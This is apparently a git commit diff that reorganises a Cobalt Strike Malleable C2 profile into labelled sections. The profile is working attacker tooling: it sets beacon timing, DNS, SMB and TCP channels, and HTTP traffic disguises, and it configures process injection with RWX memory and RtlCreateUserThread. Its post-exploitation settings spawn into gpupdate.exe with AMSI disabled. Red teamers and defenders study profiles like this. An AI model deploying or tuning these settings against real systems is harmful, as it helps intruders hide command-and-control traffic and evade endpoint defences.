Cleaned up a bit and organized.
Cleaned up and organized: - Global Options - DNS, SMB, TCP - SSL options - HTTP-Config Block - HTTP-GET Block - HTTP-POST Block - HTTP-Stager Block - Malleable PE/Stage Block - Process Inject Block - Postex Blockmaster
parent
56ddb7a407
commit
51de1c7e0c
|
@ -4,13 +4,35 @@
|
||||||
#xx0hcd
|
#xx0hcd
|
||||||
|
|
||||||
###global options###
|
###global options###
|
||||||
set sleeptime "37500";
|
|
||||||
set jitter "33";
|
|
||||||
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36";
|
|
||||||
|
|
||||||
#shows profile name in reports.
|
#shows profile name in reports.
|
||||||
set sample_name "whatever.profile";
|
set sample_name "whatever.profile";
|
||||||
|
|
||||||
|
set sleeptime "37500";
|
||||||
|
set jitter "33";
|
||||||
|
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36";
|
||||||
|
|
||||||
|
#set true to use staged payloads, false to disable staged payloads.
|
||||||
|
#set host_stage "false";
|
||||||
|
|
||||||
|
###DNS options###
|
||||||
|
set dns_idle "8.8.8.8";
|
||||||
|
set maxdns "245";
|
||||||
|
set dns_sleep "0";
|
||||||
|
set dns_stager_prepend "";
|
||||||
|
set dns_stager_subhost "";
|
||||||
|
set dns_max_txt "252";
|
||||||
|
set dns_ttl "1";
|
||||||
|
|
||||||
|
###SMB options###
|
||||||
|
#use different strings for pipename and pipename_stager.
|
||||||
|
set pipename "ntsvcs";
|
||||||
|
set pipename_stager "scerpc";
|
||||||
|
|
||||||
|
###TCP options###
|
||||||
|
set tcp_port "8000";
|
||||||
|
|
||||||
|
###SSL Options###
|
||||||
#custom cert
|
#custom cert
|
||||||
#https-certificate {
|
#https-certificate {
|
||||||
#set keystore "your_store_file.store";
|
#set keystore "your_store_file.store";
|
||||||
|
@ -35,24 +57,7 @@ https-certificate {
|
||||||
#set alias "server";
|
#set alias "server";
|
||||||
#}
|
#}
|
||||||
|
|
||||||
###DNS options###
|
###HTTP-Config Block###
|
||||||
set dns_idle "8.8.8.8";
|
|
||||||
set maxdns "245";
|
|
||||||
set dns_sleep "0";
|
|
||||||
set dns_stager_prepend "";
|
|
||||||
set dns_stager_subhost "";
|
|
||||||
set dns_max_txt "252";
|
|
||||||
set dns_ttl "1";
|
|
||||||
|
|
||||||
###SMB options###
|
|
||||||
#use different strings for pipename and pipename_stager.
|
|
||||||
set pipename "ntsvcs";
|
|
||||||
set pipename_stager "scerpc";
|
|
||||||
|
|
||||||
###TCP options###
|
|
||||||
set tcp_port "8000";
|
|
||||||
|
|
||||||
###HTTP options###
|
|
||||||
#Order of server response headers. Or you can just fill them in manually under the server blocks.
|
#Order of server response headers. Or you can just fill them in manually under the server blocks.
|
||||||
http-config {
|
http-config {
|
||||||
set headers "Server, Content-Type, Cache-Control, Connection";
|
set headers "Server, Content-Type, Cache-Control, Connection";
|
||||||
|
@ -64,7 +69,8 @@ http-config {
|
||||||
set trust_x_forwarded_for "false";
|
set trust_x_forwarded_for "false";
|
||||||
}
|
}
|
||||||
|
|
||||||
#the client GET function checks if there are tasks queued.
|
###HTTP-GET Block###
|
||||||
|
#the http-get block checks if there are tasks queued.
|
||||||
http-get {
|
http-get {
|
||||||
|
|
||||||
#You can specifiy multiple URI's with space between them.
|
#You can specifiy multiple URI's with space between them.
|
||||||
|
@ -155,11 +161,12 @@ http-get {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
###HTTP-Post Block###
|
||||||
#The same transform and termination rules apply as the client GET section above.
|
#The same transform and termination rules apply as the client GET section above.
|
||||||
#if tasks are queued then POST processes them.
|
#if tasks are queued then http-post block processes them.
|
||||||
http-post {
|
http-post {
|
||||||
|
|
||||||
#URI's cannot be the same as the client GET URI's, even changing one case is fine.
|
#URI's cannot be the same as the http-get block URI's, even changing one case is fine.
|
||||||
set uri "/Login /Config /Admin";
|
set uri "/Login /Config /Admin";
|
||||||
set verb "GET";
|
set verb "GET";
|
||||||
#set verb "POST";
|
#set verb "POST";
|
||||||
|
@ -224,7 +231,8 @@ http-post {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
#Options to set if you are using a staged payload. Stageless payloads are more Opsec safe.
|
###HTTP-Stager Block###
|
||||||
|
#Options to set if you are using a staged payload.
|
||||||
http-stager {
|
http-stager {
|
||||||
|
|
||||||
#Same URI rules apply as above, can't have URI's that match in any other client block.
|
#Same URI rules apply as above, can't have URI's that match in any other client block.
|
||||||
|
@ -250,21 +258,8 @@ http-stager {
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
###Malleable PE Options###
|
|
||||||
|
|
||||||
post-ex {
|
|
||||||
|
|
||||||
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
|
|
||||||
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
|
|
||||||
|
|
||||||
set obfuscate "true";
|
|
||||||
|
|
||||||
set smartinject "true";
|
|
||||||
|
|
||||||
set amsi_disable "true";
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
|
###Malleable PE/Stage Block###
|
||||||
#use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
|
#use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
|
||||||
#don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
|
#don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
|
||||||
stage {
|
stage {
|
||||||
|
@ -313,10 +308,12 @@ stage {
|
||||||
stringw "something";
|
stringw "something";
|
||||||
}
|
}
|
||||||
|
|
||||||
|
###Process Inject Block###
|
||||||
#controls process injection behavior
|
#controls process injection behavior
|
||||||
process-inject {
|
process-inject {
|
||||||
|
|
||||||
|
#Can use NtMapViewOfSection or VirtualAllocEx
|
||||||
|
#NtMapViewOfSection only allows same arch to same arch process injection.
|
||||||
set allocator "NtMapViewOfSection";
|
set allocator "NtMapViewOfSection";
|
||||||
|
|
||||||
set min_alloc "16700";
|
set min_alloc "16700";
|
||||||
|
@ -325,6 +322,7 @@ process-inject {
|
||||||
|
|
||||||
set startrwx "true";
|
set startrwx "true";
|
||||||
|
|
||||||
|
#prepend has to be valid code for current arch
|
||||||
transform-x86 {
|
transform-x86 {
|
||||||
prepend "\x90\x90\x90";
|
prepend "\x90\x90\x90";
|
||||||
}
|
}
|
||||||
|
@ -340,3 +338,17 @@ process-inject {
|
||||||
RtlCreateUserThread;
|
RtlCreateUserThread;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
###Post-Ex Block###
|
||||||
|
post-ex {
|
||||||
|
|
||||||
|
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
|
||||||
|
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
|
||||||
|
|
||||||
|
set obfuscate "true";
|
||||||
|
|
||||||
|
set smartinject "true";
|
||||||
|
|
||||||
|
set amsi_disable "true";
|
||||||
|
|
||||||
|
}
|
||||||
|
|
Loading…
Reference in New Issue